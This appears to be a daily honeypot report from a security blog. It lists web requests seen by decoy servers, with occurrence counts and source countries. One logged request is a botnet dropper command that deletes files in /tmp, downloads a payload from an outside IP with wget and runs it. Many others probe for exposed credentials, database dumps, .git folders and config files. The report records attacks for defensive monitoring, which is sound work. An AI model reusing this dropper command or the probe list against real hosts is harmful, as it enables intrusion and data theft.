Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-08-18

·1246 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-18
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 203 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1696 requests were recorded during the day, originating from 1 different countries, with a peak of 1408 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
GBGermany
GBGermany
USDubai
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
8.219.6.49GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
2281GET /runtime.*.js HTTP/1.1
2631GET /site.conf HTTP/1.1
2641GET /site.sql HTTP/1.1
2751GET /site/adminer.php HTTP/1.1
2761GET /site/.git/ HTTP/1.1
2771GET /site/access.log HTTP/1.1
2781GET /site/.git/HEAD HTTP/1.1
2791GET /site/.gitignore HTTP/1.1
2801GET /site/.git/logs/HEAD HTTP/1.1
2911GET /site/app.js.bak HTTP/1.1
2921GET /site/backup.sql HTTP/1.1
2931GET /site/backup.tar.gz HTTP/1.1
2941GET /site/bundle.js HTTP/1.1
2981GET /site/db.sql HTTP/1.1
2991GET /site/debug.js HTTP/1.1
3001GET /site/debug.log HTTP/1.1
3021GET /site/debug.php HTTP/1.1
3051GET /site/dump.sql HTTP/1.1
3061GET /site/dump.sql.gz HTTP/1.1
3071GET /site/error.log HTTP/1.1
3081GET /site/index-dev.php HTTP/1.1
3091GET /site/log.txt HTTP/1.1
3101GET /site/bundle.js.map HTTP/1.1
4031GET /main.dev.js HTTP/1.1
4041GET /main.*.js HTTP/1.1
4241GET /mobile/config.json HTTP/1.1
4541GET /web/error.log HTTP/1.1
4551GET /web/dump.sql.gz HTTP/1.1
4561GET /web/dump.sql HTTP/1.1
4571GET /web/debug.php HTTP/1.1
4581GET /web/debug.log HTTP/1.1
4591GET /web/debug.js HTTP/1.1
4601GET /web/db.sql HTTP/1.1
4691GET /web/wp-config.php HTTP/1.1
4701GET /web/site.sql HTTP/1.1
4711GET /web/site.conf HTTP/1.1
4941GET /local/phpinfo.php HTTP/1.1
5091\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4Qb\x1A\x13\xA2\xF5P\x7F\x05\x02\x00\x01\x00\x00\xA1\xAA
5221\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4p\x02d\x9A\xFAU$\x04\x05\x02\x00\x01\x00\x00\xA1\xAA
5371\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xA2\x00\x00\x00\x00\x00\x00\x00\x05\x02\x00\x01\x00\x00\xA1\xAA
5411GET /src/main.dev.js HTTP/1.1
5421GET /src/logs/error.log HTTP/1.1
5431GET /src/log.txt HTTP/1.1
5441GET /src/index-dev.php HTTP/1.1
5451GET /src/error.log HTTP/1.1
5461GET /src/dump.sql.gz HTTP/1.1
5471GET /src/dump.sql HTTP/1.1
5481GET /src/debug.php HTTP/1.1
5491GET /src/debug.log HTTP/1.1
5501GET /src/debug.js HTTP/1.1
5511GET /src/db.sql HTTP/1.1
5541GET /web/index-dev.php HTTP/1.1
5631GET /src/wp-config.php HTTP/1.1
5691GET /sw.js HTTP/1.1
5711GET /site/site.sql HTTP/1.1
5721GET /site/site.conf HTTP/1.1
5751GET /site/main.js HTTP/1.1
5761GET /site/main.dev.js HTTP/1.1
5771GET /site/logs/error.log HTTP/1.1
5781GET /src/database.php HTTP/1.1
5801GET /src/bundle.js.map HTTP/1.1
5811GET /src/bundle.js HTTP/1.1
5821GET /src/backup.tar.gz HTTP/1.1
5841GET /src/app.js.bak HTTP/1.1
5851GET /src/adminer.php HTTP/1.1
5861GET /src/access.log HTTP/1.1
5871GET /src/.gitignore HTTP/1.1
5881GET /src/.git/logs/HEAD HTTP/1.1
5891GET /src/.git/HEAD HTTP/1.1
5901GET /src/.git/ HTTP/1.1
5941GET /src/site.sql HTTP/1.1
5951GET /src/site.conf HTTP/1.1
5961GET /src/settings.php HTTP/1.1
5981GET /src/backup.sql HTTP/1.1
6061GET /web/bundle.js.map HTTP/1.1
6071GET /web/bundle.js HTTP/1.1
6081GET /web/backup.tar.gz HTTP/1.1
6091GET /web/backup.sql HTTP/1.1
6101GET /web/app.js.bak HTTP/1.1
6111GET /web/adminer.php HTTP/1.1
6131GET /web/.gitignore HTTP/1.1
6141GET /web/.git/logs/HEAD HTTP/1.1
6151GET /web/.git/HEAD HTTP/1.1
6161GET /web/.git/ HTTP/1.1
6231GET /web/main.js HTTP/1.1
6241GET /web/main.dev.js HTTP/1.1
6251GET /web/logs/error.log HTTP/1.1
6261GET /web/log.txt HTTP/1.1
6271GET /web/access.log HTTP/1.1
6711GET /api/v1/config HTTP/1.1
7591GET /.github/workflows/secrets.yml HTTP/1.1
7631GET /app.js.bak HTTP/1.1
7641GET /app.*.js HTTP/1.1
7661GET /api/v2/profile HTTP/1.1
7841GET /api/v1/token/refresh HTTP/1.1
8491GET /admin/main.dev.js HTTP/1.1
8521GET /admin/log.txt HTTP/1.1
8541GET /admin/index-dev.php HTTP/1.1
8581GET /admin/error.log HTTP/1.1
8591GET /admin/dump.sql.gz HTTP/1.1
8601GET /admin/dump.sql HTTP/1.1
8651GET /admin/wp-config.php HTTP/1.1
8701GET /admin/site.sql HTTP/1.1
8711GET /admin/site.conf HTTP/1.1
8851GET /admin/backup.sql HTTP/1.1
8861GET /admin/app.js.bak HTTP/1.1
8881GET /admin/adminer.php HTTP/1.1
8891GET /admin/access.log HTTP/1.1
8901GET /admin/.gitignore HTTP/1.1
8911GET /admin/.git/logs/HEAD HTTP/1.1
8921GET /admin/.git/HEAD HTTP/1.1
8931GET /admin/.git/ HTTP/1.1
8961GET /admin/main.js HTTP/1.1
8991GET /admin/backup.tar.gz HTTP/1.1
9001GET /admin/bundle.js HTTP/1.1
9011GET /admin/bundle.js.map HTTP/1.1
9101GET /admin/debug.js HTTP/1.1
9111GET /admin/debug.log HTTP/1.1
9141GET /core/access.log HTTP/1.1
9151GET /core/.gitignore HTTP/1.1
9161GET /core/.git/logs/HEAD HTTP/1.1
9171GET /core/.git/HEAD HTTP/1.1
9181GET /core/.git/ HTTP/1.1
9221GET /core/phpinfo.php HTTP/1.1
9231GET /core/main.js HTTP/1.1
9241GET /core/main.dev.js HTTP/1.1
9251GET /core/logs/error.log HTTP/1.1
9261GET /core/log.txt HTTP/1.1
9271GET /core/index-dev.php HTTP/1.1
9281GET /core/error.log HTTP/1.1
9301GET /core/dump.sql HTTP/1.1
9311GET /core/debug.php HTTP/1.1
9321GET /core/debug.log HTTP/1.1
9331GET /core/debug.js HTTP/1.1
9451GET /core/dump.sql.gz HTTP/1.1
9521GET /config/main.js HTTP/1.1
9531GET /config/main.dev.js HTTP/1.1
9561GET /config/logs/error.log HTTP/1.1
9571GET /config/log.txt HTTP/1.1
9581GET /config/index-dev.php HTTP/1.1
9591GET /config/error.log HTTP/1.1
9601GET /config/dump.sql.gz HTTP/1.1
9611GET /core/adminer.php HTTP/1.1
9661GET /config/site.sql HTTP/1.1
9671GET /config/site.conf HTTP/1.1
9721GET /core/bundle.js.map HTTP/1.1
9731GET /core/bundle.js HTTP/1.1
9741GET /core/backup.tar.gz HTTP/1.1
9751GET /core/backup.sql HTTP/1.1
9761GET /core/app.js.bak HTTP/1.1
9771GET /config/dump.sql HTTP/1.1
9881GET /dump.sql.gz HTTP/1.1
10031GET /index.*.js HTTP/1.1
10041GET /index-dev.php HTTP/1.1
10141GET /core/db.sql HTTP/1.1
10271GET /debug.js HTTP/1.1
10381GET /core/site.conf HTTP/1.1
10391GET /core/site.sql HTTP/1.1
10401GET /core/wp-config.php HTTP/1.1
10431GET /backup/.git/ HTTP/1.1
10541GET /backup/dump.sql HTTP/1.1
10551GET /backup/debug.php HTTP/1.1
10561GET /backup/debug.log HTTP/1.1
10571GET /backup/debug.js HTTP/1.1
10591GET /backup/database.php HTTP/1.1
10611GET /backup/bundle.js.map HTTP/1.1
10621GET /backup/bundle.js HTTP/1.1
10631GET /backup/backup.tar.gz HTTP/1.1
10641GET /backup/backup.sql HTTP/1.1
10651GET /backup/app.js.bak HTTP/1.1
10661GET /backup/adminer.php HTTP/1.1
10671GET /backup/access.log HTTP/1.1
10681GET /backup/.gitignore HTTP/1.1
10691GET /backup/.git/logs/HEAD HTTP/1.1
10741GET /backup/db.sql HTTP/1.1
10901GET /backup/.git/HEAD HTTP/1.1
11161GET /config/app.js.bak HTTP/1.1
11171GET /config/adminer.php HTTP/1.1
11181GET /config/access.log HTTP/1.1
11211GET /config/.gitignore HTTP/1.1
11231GET /config/.git/HEAD HTTP/1.1
11241GET /config/.git/ HTTP/1.1
11291GET /config/debug.php HTTP/1.1
11301GET /config/debug.log HTTP/1.1
11311GET /config/debug.js HTTP/1.1
11321GET /config/db.sql HTTP/1.1
11341GET /config/bundle.js.map HTTP/1.1
11351GET /config/bundle.js HTTP/1.1
11361GET /config/backup.tar.gz HTTP/1.1
11371GET /config/backup.sql HTTP/1.1
11381GET /config/.git/logs/HEAD HTTP/1.1
11391GET /backup/site.sql HTTP/1.1
11401GET /backup/site.conf HTTP/1.1
11431GET /backup/main.js HTTP/1.1
11441GET /backup/main.dev.js HTTP/1.1
11451GET /backup/logs/error.log HTTP/1.1
11461GET /backup/log.txt HTTP/1.1
11471GET /backup/index-dev.php HTTP/1.1
11481GET /backup/error.log HTTP/1.1
11491GET /backup/dump.sql.gz HTTP/1.1
11651GET /bundle.js.map HTTP/1.1
11661GET /bundle.min.js HTTP/1.1
11711GET /.env.local.php HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
01408GB
172US
246MA
341DE
423NL
519BG
616PL
715SC
811HK
98LT
105SG
115CA
124ZA
134CN
143KR
153FR
163SA
172CH
182BE
192ES
201IN
211RO
221MC
231IR

Related

Report: 2025-08-17
·2205 words
Repport Daily
Report: 2025-08-16
·329 words
Repport Daily
Report: 2025-08-15
·2637 words
Repport Daily